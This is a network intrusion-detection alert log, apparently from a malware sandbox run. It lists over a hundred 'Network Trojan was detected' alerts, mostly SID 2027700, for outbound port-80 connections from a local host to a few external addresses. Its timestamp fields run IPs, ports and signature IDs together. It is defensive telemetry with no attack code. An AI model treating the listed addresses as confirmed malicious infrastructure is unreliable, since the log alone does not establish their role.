                                SID:2027700
                                Source Port:50188
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949766802027700 01/05/23-08:58:40.852775
                                SID:2027700
                                Source Port:49766
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950005802027700 01/05/23-08:59:32.550774
                                SID:2027700
                                Source Port:50005
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950201802027700 01/05/23-09:00:01.069838
                                SID:2027700
                                Source Port:50201
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350651802027700 01/05/23-09:00:52.589844
                                SID:2027700
                                Source Port:50651
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350318802027700 01/05/23-09:00:12.832869
                                SID:2027700
                                Source Port:50318
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349918802027700 01/05/23-08:59:14.341314
                                SID:2027700
                                Source Port:49918
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350537802027700 01/05/23-09:00:39.548579
                                SID:2027700
                                Source Port:50537
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950459802027700 01/05/23-09:00:30.125983
                                SID:2027700
                                Source Port:50459
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350794802027700 01/05/23-09:01:04.736982
                                SID:2027700
                                Source Port:50794
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350302802027700 01/05/23-09:00:11.001548
                                SID:2027700
                                Source Port:50302
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350728802027700 01/05/23-09:00:59.312783
                                SID:2027700
                                Source Port:50728
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349851802027700 01/05/23-08:59:04.864545
                                SID:2027700
                                Source Port:49851
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949868802027700 01/05/23-08:59:08.167063
                                SID:2027700
                                Source Port:49868
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350223802027700 01/05/23-09:00:03.373229
                                SID:2027700
                                Source Port:50223
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350111802027700 01/05/23-08:59:51.099949
                                SID:2027700
                                Source Port:50111
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949776802027700 01/05/23-08:58:47.022979
                                SID:2027700
                                Source Port:49776
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949865802027700 01/05/23-08:59:07.706533
                                SID:2027700
                                Source Port:49865
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950293802027700 01/05/23-09:00:10.018229
                                SID:2027700
                                Source Port:50293
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350801802027700 01/05/23-09:01:05.514891
                                SID:2027700
                                Source Port:50801
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350753802027700 01/05/23-09:01:01.501451
                                SID:2027700
                                Source Port:50753
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949893802027700 01/05/23-08:59:11.534097
                                SID:2027700
                                Source Port:49893
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350740802027700 01/05/23-09:01:00.158500
                                SID:2027700
                                Source Port:50740
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949763802027700 01/05/23-08:58:39.887077
                                SID:2027700
                                Source Port:49763
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350381802027700 01/05/23-09:00:22.389206
                                SID:2027700
                                Source Port:50381
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950802802027700 01/05/23-09:01:05.461255
                                SID:2027700
                                Source Port:50802
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350404802027700 01/05/23-09:00:24.419327
                                SID:2027700
                                Source Port:50404
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950624802027700 01/05/23-09:00:47.347216
                                SID:2027700
                                Source Port:50624
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950560802027700 01/05/23-09:00:41.533952
                                SID:2027700
                                Source Port:50560
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350124802027700 01/05/23-08:59:52.475789
                                SID:2027700
                                Source Port:50124
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350343802027700 01/05/23-09:00:17.694310
                                SID:2027700
                                Source Port:50343
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950227802027700 01/05/23-09:00:03.688487
                                SID:2027700
                                Source Port:50227
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350309802027700 01/05/23-09:00:11.565614
                                SID:2027700
                                Source Port:50309
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350214802027700 01/05/23-09:00:02.369106
                                SID:2027700
                                Source Port:50214
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350701802027700 01/05/23-09:00:56.481195
                                SID:2027700
                                Source Port:50701
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949805802027700 01/05/23-08:58:53.690359
                                SID:2027700
                                Source Port:49805
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950678802027700 01/05/23-09:00:54.216882
                                SID:2027700
                                Source Port:50678
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950620802027700 01/05/23-09:00:46.787763
                                SID:2027700
                                Source Port:50620
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950326802027700 01/05/23-09:00:15.806375
                                SID:2027700
                                Source Port:50326
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950452802027700 01/05/23-09:00:29.247094
                                SID:2027700
                                Source Port:50452
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950100802027700 01/05/23-08:59:50.026244
                                SID:2027700
                                Source Port:50100
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350527802027700 01/05/23-09:00:38.677413
                                SID:2027700
                                Source Port:50527
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949989802027700 01/05/23-08:59:29.932735
                                SID:2027700
                                Source Port:49989
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349880802027700 01/05/23-08:59:09.534066
                                SID:2027700
                                Source Port:49880
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950617802027700 01/05/23-09:00:46.538369
                                SID:2027700
                                Source Port:50617
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350345802027700 01/05/23-09:00:17.933632
                                SID:2027700
                                Source Port:50345
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350697802027700 01/05/23-09:00:56.202740
                                SID:2027700
                                Source Port:50697
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949838802027700 01/05/23-08:59:02.434163
                                SID:2027700
                                Source Port:49838
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950301802027700 01/05/23-09:00:10.887501
                                SID:2027700
                                Source Port:50301
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950751802027700 01/05/23-09:01:01.289899
                                SID:2027700
                                Source Port:50751
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350239802027700 01/05/23-09:00:04.805599
                                SID:2027700
                                Source Port:50239
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949956802027700 01/05/23-08:59:24.097365
                                SID:2027700
                                Source Port:49956
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350519802027700 01/05/23-09:00:38.045914
                                SID:2027700
                                Source Port:50519
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950609802027700 01/05/23-09:00:45.737326
                                SID:2027700
                                Source Port:50609
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950030802027700 01/05/23-08:59:40.263648
                                SID:2027700
                                Source Port:50030
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350608802027700 01/05/23-09:00:45.689518
                                SID:2027700
                                Source Port:50608
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350270802027700 01/05/23-09:00:07.812383
                                SID:2027700
                                Source Port:50270
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350105802027700 01/05/23-08:59:50.538555
                                SID:2027700
                                Source Port:50105
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.4211.40.39.25149930802851815 01/05/23-08:59:16.388071
                                SID:2851815
                                Source Port:49930
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350079802027700 01/05/23-08:59:47.654139
                                SID:2027700
                                Source Port:50079
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949825802027700 01/05/23-08:58:56.824088
                                SID:2027700
                                Source Port:49825
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350158802027700 01/05/23-08:59:57.230242
                                SID:2027700
                                Source Port:50158
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350816802027700 01/05/23-09:01:06.642475
                                SID:2027700
                                Source Port:50816
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950043802027700 01/05/23-08:59:42.619809
                                SID:2027700
                                Source Port:50043
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349955802027700 01/05/23-08:59:24.235160
                                SID:2027700
                                Source Port:49955
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349857802027700 01/05/23-08:59:06.387562
                                SID:2027700
                                Source Port:49857
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350546802027700 01/05/23-09:00:40.334545
                                SID:2027700
                                Source Port:50546
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350088802027700 01/05/23-08:59:48.940730
                                SID:2027700
                                Source Port:50088
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950514802027700 01/05/23-09:00:37.529136
                                SID:2027700
                                Source Port:50514
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950321802027700 01/05/23-09:00:13.437731
                                SID:2027700
                                Source Port:50321
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350605802027700 01/05/23-09:00:45.483828
                                SID:2027700
                                Source Port:50605
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350754802027700 01/05/23-09:01:01.509686
                                SID:2027700
                                Source Port:50754
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350066802027700 01/05/23-08:59:45.969649
                                SID:2027700
                                Source Port:50066
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350579802027700 01/05/23-09:00:43.093350
                                SID:2027700
                                Source Port:50579
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950264802027700 01/05/23-09:00:07.273682
                                SID:2027700
                                Source Port:50264
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350325802027700 01/05/23-09:00:13.993553
                                SID:2027700
                                Source Port:50325
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950007802027700 01/05/23-08:59:32.867939
                                SID:2027700
                                Source Port:50007
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350250802027700 01/05/23-09:00:05.855487
                                SID:2027700
                                Source Port:50250
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350616802027700 01/05/23-09:00:46.402098
                                SID:2027700
                                Source Port:50616
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949858802027700 01/05/23-08:59:06.303869
                                SID:2027700
                                Source Port:49858
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349844802027700 01/05/23-08:59:03.705485
                                SID:2027700
                                Source Port:49844
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350125802027700 01/05/23-08:59:52.616338
                                SID:2027700
                                Source Port:50125
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950339802027700 01/05/23-09:00:17.228637
                                SID:2027700
                                Source Port:50339
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950547802027700 01/05/23-09:00:40.389420
                                SID:2027700
                                Source Port:50547
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949969802027700 01/05/23-08:59:26.763344
                                SID:2027700
                                Source Port:49969
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350131802027700 01/05/23-08:59:53.175791
                                SID:2027700
                                Source Port:50131
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350320802027700 01/05/23-09:00:13.343604
                                SID:2027700
                                Source Port:50320
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350385802027700 01/05/23-09:00:22.562941
                                SID:2027700
                                Source Port:50385
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950370802027700 01/05/23-09:00:21.112704
                                SID:2027700
                                Source Port:50370
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350652802027700 01/05/23-09:00:52.568964
                                SID:2027700
                                Source Port:50652
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350006802027700 01/05/23-08:59:32.667620
                                SID:2027700
                                Source Port:50006
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350177802027700 01/05/23-08:59:58.690383
                                SID:2027700
                                Source Port:50177
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950571802027700 01/05/23-09:00:42.476353
                                SID:2027700
                                Source Port:50571
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949756802027700 01/05/23-08:58:38.209554
                                SID:2027700
                                Source Port:49756
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950755802027700 01/05/23-09:01:01.595984
                                SID:2027700
                                Source Port:50755
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950412802027700 01/05/23-09:00:25.086655
                                SID:2027700
                                Source Port:50412
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949845802027700 01/05/23-08:59:03.794441
                                SID:2027700
                                Source Port:49845
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949943802027700 01/05/23-08:59:21.437009
                                SID:2027700
                                Source Port:49943
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350711802027700 01/05/23-09:00:57.589885
                                SID:2027700
                                Source Port:50711
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350428802027700 01/05/23-09:00:26.587203
                                SID:2027700
                                Source Port:50428
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350774802027700 01/05/23-09:01:03.115251
                                SID:2027700
                                Source Port:50774
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350806802027700 01/05/23-09:01:05.939953
                                SID:2027700
                                Source Port:50806
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350056802027700 01/05/23-08:59:44.471517
                                SID:2027700
                                Source Port:50056
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350803802027700 01/05/23-09:01:05.539950
                                SID:2027700
                                Source Port:50803
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950685802027700 01/05/23-09:00:55.221387
                                SID:2027700
                                Source Port:50685
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350809802027700 01/05/23-09:01:06.079110
                                SID:2027700
                                Source Port:50809
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950817802027700 01/05/23-09:01:06.726550
                                SID:2027700
                                Source Port:50817
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950235802027700 01/05/23-09:00:04.508115
                                SID:2027700
                                Source Port:50235
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349995802027700 01/05/23-08:59:30.866105
                                SID:2027700
                                Source Port:49995
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950146802027700 01/05/23-08:59:54.381680
                                SID:2027700
                                Source Port:50146
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350714802027700 01/05/23-09:00:57.703515
                                SID:2027700
                                Source Port:50714
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349869802027700 01/05/23-08:59:08.266960
                                SID:2027700
                                Source Port:49869
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949996802027700 01/05/23-08:59:30.931807
                                SID:2027700
                                Source Port:49996
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950403802027700 01/05/23-09:00:24.288421
                                SID:2027700
                                Source Port:50403
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350151802027700 01/05/23-08:59:54.833832
                                SID:2027700
                                Source Port:50151
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350300802027700 01/05/23-09:00:10.721101
                                SID:2027700
                                Source Port:50300
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350234802027700 01/05/23-09:00:04.336653
                                SID:2027700
                                Source Port:50234
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350684802027700 01/05/23-09:00:55.017216
                                SID:2027700
                                Source Port:50684
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350148802027700 01/05/23-08:59:54.583580
                                SID:2027700
                                Source Port:50148
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350497802027700 01/05/23-09:00:35.817971
                                SID:2027700
                                Source Port:50497
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350243802027700 01/05/23-09:00:05.196825
                                SID:2027700
                                Source Port:50243
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950346802027700 01/05/23-09:00:17.999143
                                SID:2027700
                                Source Port:50346
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350595802027700 01/05/23-09:00:44.351558
                                SID:2027700
                                Source Port:50595
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350059802027700 01/05/23-08:59:44.753563
                                SID:2027700
                                Source Port:50059
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350596802027700 01/05/23-09:00:44.474758
                                SID:2027700
                                Source Port:50596
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350431802027700 01/05/23-09:00:26.987028
                                SID:2027700
                                Source Port:50431
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949993802027700 01/05/23-08:59:30.595868
                                SID:2027700
                                Source Port:49993
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949911802027700 01/05/23-08:59:13.527874
                                SID:2027700
                                Source Port:49911
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349939802027700 01/05/23-08:59:17.298134
                                SID:2027700
                                Source Port:49939
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350501802027700 01/05/23-09:00:36.687757
                                SID:2027700
                                Source Port:50501
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350313802027700 01/05/23-09:00:11.945166
                                SID:2027700
                                Source Port:50313
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350573802027700 01/05/23-09:00:42.640948
                                SID:2027700
                                Source Port:50573
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350402802027700 01/05/23-09:00:24.157770
                                SID:2027700
                                Source Port:50402
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350237802027700 01/05/23-09:00:04.785091
                                SID:2027700
                                Source Port:50237
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350259802027700 01/05/23-09:00:06.795361
                                SID:2027700
                                Source Port:50259
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950584802027700 01/05/23-09:00:43.727136
                                SID:2027700
                                Source Port:50584
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949841802027700 01/05/23-08:59:03.391327
                                SID:2027700
                                Source Port:49841
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950498802027700 01/05/23-09:00:35.865431
                                SID:2027700
                                Source Port:50498
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950244802027700 01/05/23-09:00:05.330627
                                SID:2027700
                                Source Port:50244
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350570802027700 01/05/23-09:00:42.356827
                                SID:2027700
                                Source Port:50570
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12349856802027700 01/05/23-08:59:05.854605
                                SID:2027700
                                Source Port:49856
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949924802027700 01/05/23-08:59:15.349563
                                SID:2027700
                                Source Port:49924
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950050802027700 01/05/23-08:59:43.526081
                                SID:2027700
                                Source Port:50050
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950429802027700 01/05/23-09:00:26.766515
                                SID:2027700
                                Source Port:50429
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10949768802027700 01/05/23-08:58:44.569908
                                SID:2027700
                                Source Port:49768
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350332802027700 01/05/23-09:00:16.344925
                                SID:2027700
                                Source Port:50332
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950669802027700 01/05/23-09:00:53.437300
                                SID:2027700
                                Source Port:50669
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.32.200.11350095802027700 01/05/23-08:59:49.534064
                                SID:2027700
                                Source Port:50095
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.462.204.41.10950804802027700 01/05/23-09:01:05.730740
                                SID:2027700
                                Source Port:50804
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:192.168.2.445.66.230.12350303802027700 01/05/23-09:00:10.920218
                                SID:2027700
                                Source Port:50303
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
